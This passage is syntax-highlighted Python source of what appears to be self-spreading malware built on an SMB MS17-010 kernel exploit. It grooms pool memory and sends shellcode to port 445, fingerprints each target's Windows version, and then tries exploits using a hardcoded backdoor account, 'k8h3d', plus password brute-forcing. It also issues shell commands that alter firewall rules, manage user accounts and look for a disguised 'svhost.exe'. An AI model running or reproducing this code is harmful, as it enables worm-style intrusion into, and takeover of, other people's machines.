    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">numGroomConn1</span><span class="p">):</span>
        <span class="n">sk3</span> <span class="o">=</span> <span class="n">createConnectionWithBigSMBFirst80</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
        <span class="n">srvnetConn3</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">sk3</span><span class="p">)</span>

    <span class="n">holeConn3</span> <span class="o">=</span> <span class="n">createSessionAllocNonPaged</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">NTFEA_SIZE</span> <span class="o">-</span> <span class="mi">16</span><span class="p">)</span>
    <span class="n">allocConn3</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">):</span>
        <span class="n">sk3</span> <span class="o">=</span> <span class="n">createConnectionWithBigSMBFirst80</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
        <span class="n">srvnetConn3</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">sk3</span><span class="p">)</span>

    <span class="n">holeConn3</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="n">send_trans2_second</span><span class="p">(</span><span class="n">conn3</span><span class="p">,</span> <span class="n">tid3</span><span class="p">,</span> <span class="n">feaList</span><span class="p">[</span><span class="n">progress3</span><span class="p">:],</span> <span class="n">progress3</span><span class="p">)</span>
    <span class="n">recvPkt3</span> <span class="o">=</span> <span class="n">conn3</span><span class="p">.</span><span class="n">recvSMB</span><span class="p">()</span>
    <span class="n">retStatus3</span> <span class="o">=</span> <span class="n">recvPkt3</span><span class="p">.</span><span class="n">getNTStatus</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">retStatus3</span> <span class="o">==</span> <span class="il">3221225485L</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'good response status: INVALID_PARAMETER'</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="p">(</span><span class="s">'bad response status: 0x{:08x}'</span><span class="p">).</span><span class="nb">format</span><span class="p">(</span><span class="n">retStatus3</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">sk3</span> <span class="ow">in</span> <span class="n">srvnetConn3</span><span class="p">:</span>
        <span class="n">sk3</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">fake_recv_struct</span> <span class="o">+</span> <span class="n">shellcode</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">sk3</span> <span class="ow">in</span> <span class="n">srvnetConn3</span><span class="p">:</span>
        <span class="n">sk3</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

    <span class="n">conn3</span><span class="p">.</span><span class="n">disconnect_tree</span><span class="p">(</span><span class="n">tid3</span><span class="p">)</span>
    <span class="n">conn3</span><span class="p">.</span><span class="n">logoff</span><span class="p">()</span>
    <span class="n">conn3</span><span class="p">.</span><span class="n">get_socket</span><span class="p">().</span><span class="n">close</span><span class="p">()</span>
    <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
    <span class="n">lock3</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="n">NEGOTIATE_PROTOCOL_REQUEST</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200'</span><span class="p">)</span>
<span class="n">SESSION_SETUP_REQUEST</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000'</span><span class="p">)</span>
<span class="n">TREE_CONNECT_REQUEST</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00'</span><span class="p">)</span>
<span class="n">NAMED_PIPE_TRANS_REQUEST</span> <span class="o">=</span> <span class="n">binascii</span><span class="p">.</span><span class="n">unhexlify</span><span class="p">(</span><span class="s">'0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00'</span><span class="p">)</span>
<span class="n">timeout</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">verbose</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">threads_num</span> <span class="o">=</span> <span class="mi">255</span>
<span class="k">if</span> <span class="s">'Windows-XP'</span> <span class="ow">in</span> <span class="n">platform</span><span class="p">.</span><span class="n">platform</span><span class="p">():</span>
    <span class="n">timeout</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="n">threads_num</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">semaphore1</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
    <span class="n">semaphore</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
    <span class="n">semaphore2</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="n">semaphore1</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">255</span><span class="p">)</span>
    <span class="n">semaphore</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="n">threads_num</span><span class="p">)</span>
    <span class="n">semaphore2</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">BoundedSemaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">100</span><span class="p">)</span>
<span class="n">print_lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Lock</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">print_lock</span>
    <span class="k">with</span> <span class="n">print_lock</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'[*] [%s] %s'</span> <span class="o">%</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">check_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">tg</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">verbose</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">timeout</span><span class="p">)</span> <span class="k">if</span> <span class="n">timeout</span> <span class="k">else</span> <span class="bp">None</span><span class="p">)</span>
    <span class="n">host</span> <span class="o">=</span> <span class="n">ip</span>
    <span class="n">port</span> <span class="o">=</span> <span class="mi">445</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'Sending negotiation protocol request'</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">NEGOTIATE_PROTOCOL_REQUEST</span><span class="p">)</span>
    <span class="n">negotiate_reply</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">negotiate_reply</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">36</span> <span class="ow">or</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">negotiate_reply</span><span class="p">[</span><span class="mi">9</span><span class="p">:</span><span class="mi">13</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">with</span> <span class="n">print_lock</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"[-] [%s] can't determine whether it's vulunerable"</span> <span class="o">%</span> <span class="n">ip</span>
            <span class="k">return</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'Sending session setup request'</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">SESSION_SETUP_REQUEST</span><span class="p">)</span>
    <span class="n">session_setup_response</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="n">user_id</span> <span class="o">=</span> <span class="n">session_setup_response</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">34</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_st</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'User ID = %s'</span> <span class="o">%</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">user_id</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span>
    <span class="n">os</span> <span class="o">=</span> <span class="s">''</span>
    <span class="n">word_count</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">session_setup_response</span><span class="p">[</span><span class="mi">36</span><span class="p">])</span>
    <span class="k">if</span> <span class="n">word_count</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">byte_count</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">session_setup_response</span><span class="p">[</span><span class="mi">43</span><span class="p">:</span><span class="mi">45</span><span class="p">])[</span><span class="mi">0</span><span class="p">]</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">session_setup_response</span><span class="p">)</span> <span class="o">!=</span> <span class="n">byte_count</span> <span class="o">+</span> <span class="mi">45</span><span class="p">:</span>
            <span class="n">print_status</span><span class="p">(</span><span class="s">'invalid session setup AndX response'</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">46</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">session_setup_response</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span>
                <span class="k">if</span> <span class="nb">ord</span><span class="p">(</span><span class="n">session_setup_response</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="nb">ord</span><span class="p">(</span><span class="n">session_setup_response</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">])</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                    <span class="n">os</span> <span class="o">=</span> <span class="n">session_setup_response</span><span class="p">[</span><span class="mi">46</span><span class="p">:</span><span class="n">i</span><span class="p">].</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)[::</span><span class="mi">2</span><span class="p">]</span>
                    <span class="k">break</span>

    <span class="n">modified_tree_connect_request</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">TREE_CONNECT_REQUEST</span><span class="p">)</span>
    <span class="n">modified_tree_connect_request</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_id</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">modified_tree_connect_request</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_id</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">modified_tree_connect_request</span> <span class="o">=</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">(</span><span class="n">modified_tree_connect_request</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'Sending tree connect'</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">modified_tree_connect_request</span><span class="p">)</span>
    <span class="n">tree_connect_response</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="n">tree_id</span> <span class="o">=</span> <span class="n">tree_connect_response</span><span class="p">[</span><span class="mi">28</span><span class="p">:</span><span class="mi">30</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'Tree ID = %s'</span> <span class="o">%</span> <span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'&lt;H'</span><span class="p">,</span> <span class="n">tree_id</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span>
    <span class="n">modified_trans2_session_setup</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">NAMED_PIPE_TRANS_REQUEST</span><span class="p">)</span>
    <span class="n">modified_trans2_session_setup</span><span class="p">[</span><span class="mi">28</span><span class="p">]</span> <span class="o">=</span> <span class="n">tree_id</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">modified_trans2_session_setup</span><span class="p">[</span><span class="mi">29</span><span class="p">]</span> <span class="o">=</span> <span class="n">tree_id</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">modified_trans2_session_setup</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_id</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">modified_trans2_session_setup</span><span class="p">[</span><span class="mi">33</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_id</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">modified_trans2_session_setup</span> <span class="o">=</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">(</span><span class="n">modified_trans2_session_setup</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">verbose</span><span class="p">:</span>
        <span class="n">print_status</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'Sending named pipe'</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">modified_trans2_session_setup</span><span class="p">)</span>
    <span class="n">final_response</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">final_response</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">==</span> <span class="s">'</span><span class="se">\x05</span><span class="s">'</span> <span class="ow">and</span> <span class="n">final_response</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">==</span> <span class="s">'</span><span class="se">\x02</span><span class="s">'</span> <span class="ow">and</span> <span class="n">final_response</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">==</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="ow">and</span> <span class="n">final_response</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">==</span> <span class="s">'</span><span class="se">\xc0</span><span class="s">'</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'[+] [%s](%s) got it!'</span> <span class="o">%</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">os</span><span class="p">)</span>
        <span class="k">if</span> <span class="s">'Windows 7'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'[+] exploit...'</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s">'   win7'</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'no user'</span>
                    <span class="k">try</span><span class="p">:</span>
                        <span class="n">exploit2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">sc</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="mi">13</span><span class="p">)))</span>
                        <span class="k">try</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'exp again '</span>
                            <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                        <span class="k">except</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'no user2'</span>

                        <span class="n">lock2</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>
                    <span class="k">except</span><span class="p">:</span>
                        <span class="k">print</span> <span class="s">'[*] maybe crash'</span>
                        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span>
                        <span class="k">try</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'exp again '</span>
                            <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                        <span class="k">except</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'no user3'</span>

                        <span class="n">lock2</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

        <span class="k">elif</span> <span class="s">'Windows Server 2008'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'[+] exploit...'</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s">'   win2k8'</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'no user'</span>
                    <span class="k">try</span><span class="p">:</span>
                        <span class="n">exploit3</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">sc</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="mi">13</span><span class="p">)))</span>
                        <span class="k">try</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'exp again '</span>
                            <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                        <span class="k">except</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'no user 2'</span>

                        <span class="n">lock3</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>
                    <span class="k">except</span><span class="p">:</span>
                        <span class="k">print</span> <span class="s">'[*] maybe crash'</span>
                        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span>
                        <span class="k">try</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'exp again '</span>
                            <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">'k8h3d'</span><span class="p">,</span> <span class="s">'k8d3j9SjfS7'</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                        <span class="k">except</span><span class="p">:</span>
                            <span class="k">print</span> <span class="s">'no user 3'</span>

                        <span class="n">lock3</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

        <span class="k">if</span> <span class="s">'Windows 5.1'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'[+] exploit...'</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s">'   xp'</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">''</span><span class="p">,</span> <span class="s">''</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'not succ'</span>

        <span class="k">elif</span> <span class="s">'Windows Server 2003'</span> <span class="ow">in</span> <span class="n">os</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="k">print</span> <span class="s">'[+] exploit...'</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s">'   win2k3'</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="s">''</span><span class="p">,</span> <span class="s">''</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'not succ'</span>

        <span class="k">elif</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'[+] exploit...'</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s">'   *************************other os'</span>
            <span class="k">for</span> <span class="n">u</span> <span class="ow">in</span> <span class="n">userlist</span><span class="p">:</span>
                <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">passlist</span><span class="p">:</span>
                    <span class="k">if</span> <span class="n">u</span> <span class="o">==</span> <span class="s">''</span> <span class="ow">and</span> <span class="n">p</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
                        <span class="k">continue</span>
                    <span class="k">try</span><span class="p">:</span>
                        <span class="n">exploit</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">tg</span><span class="p">)</span>
                    <span class="k">except</span><span class="p">:</span>
                        <span class="k">print</span> <span class="s">'exp not succ!'</span>

    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'[-] [%s](%s) stays in safety'</span> <span class="o">%</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">os</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">check_thread</span><span class="p">(</span><span class="n">ip_address</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">semaphore</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">check_ip</span><span class="p">(</span><span class="n">ip_address</span><span class="p">,</span> <span class="n">tg</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">with</span> <span class="n">print_lock</span><span class="p">:</span>
                <span class="n">tmp</span> <span class="o">=</span> <span class="mi">2</span>

    <span class="k">finally</span><span class="p">:</span>
        <span class="n">semaphore</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">check_thread2</span><span class="p">(</span><span class="n">ip_address</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">check_ip</span><span class="p">(</span><span class="n">ip_address</span><span class="p">,</span> <span class="n">tg</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">with</span> <span class="n">print_lock</span><span class="p">:</span>
                <span class="n">tmp</span> <span class="o">=</span> <span class="mi">2</span>

    <span class="k">finally</span><span class="p">:</span>
        <span class="n">semaphore</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="n">one</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">try</span><span class="p">:</span>
    <span class="n">h_one</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">()</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="p">(</span><span class="s">''</span><span class="p">,</span> <span class="mi">60124</span><span class="p">)</span>
    <span class="n">h_one</span><span class="p">.</span><span class="n">bind</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
    <span class="n">one</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">except</span><span class="p">:</span>
    <span class="n">one</span> <span class="o">=</span> <span class="mi">2</span>

<span class="k">if</span> <span class="n">one</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
    <span class="k">print</span> <span class="s">'alredy run eb'</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">()</span>
<span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c net user&amp;netsh advfirewall set allprofile state on&amp;netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
<span class="n">dusr</span> <span class="o">=</span> <span class="n">usr</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">if</span> <span class="s">'k8h3d'</span> <span class="ow">in</span> <span class="n">dusr</span><span class="p">:</span>
    <span class="n">usr</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'cmd /c net user k8h3d /del'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">)</span>
<span class="n">dl</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">ee2</span> <span class="o">=</span> <span class="s">''</span>
<span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">'c:/windows/system32/svhost.exe'</span><span class="p">):</span>
    <span class="n">dl</span> <span class="o">=</span> <span class="s">'c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">system32</span><span class="se">\\</span><span class="s">svhost.exe'</span>
